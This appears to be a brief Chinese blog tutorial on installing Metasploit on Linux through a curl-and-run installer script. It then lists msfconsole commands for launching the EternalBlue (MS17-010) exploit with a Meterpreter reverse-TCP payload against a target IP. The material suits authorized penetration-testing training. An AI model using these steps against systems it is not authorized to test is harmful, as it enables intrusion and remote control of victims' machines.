Metasploit简单使用——安装和简单使用

以下是非kali的Linux下安装MSF框架

一键安装

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall   
adduser msf           #添加msf用户
su msf                #切换到msf用户
cd  /opt/metasploit-framework/bin   #切换到msf所在的目录 
./msfconsole          #以后启动msfconsole，都切换到msf用户下启动，这样会同步数据库。如果使用root用户启动的话，不会同步数据库  
 
也可以将msfconsole加入到执行目录下，这样在任何目录直接msfconsole就可以了
ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole
 
#备注：
#初次运行msf会创建数据库，但是msf默认使用的PostgreSQL数据库不能与root用户关联，这也这也就是需要新建用户msf来运行metasploit的原因所在。如果你一不小心手一抖，初次运行是在root用户下，请使用 msfdb reinit 命令，然后使用非root用户初始化数据库。        
 
MSF后期的升级：msfupdate

使用方法（永恒之蓝为例）：

• 进入框架：msfconsole

• 使用search命令查找相关漏洞： search  ms17-010

• 使用use进入模块:  use exploit/windows/smb/ms17_010_eternalblue   

• 使用info查看模块信息： info 

• 设置攻击载荷：set payload windows/x64/meterpreter/reverse_tcp

• 查看模块需要配置的参数：show options

• 设置参数：set  RHOST  192.168.2.123(目标IP)

• 攻击：exploit /  run

• 后渗透阶段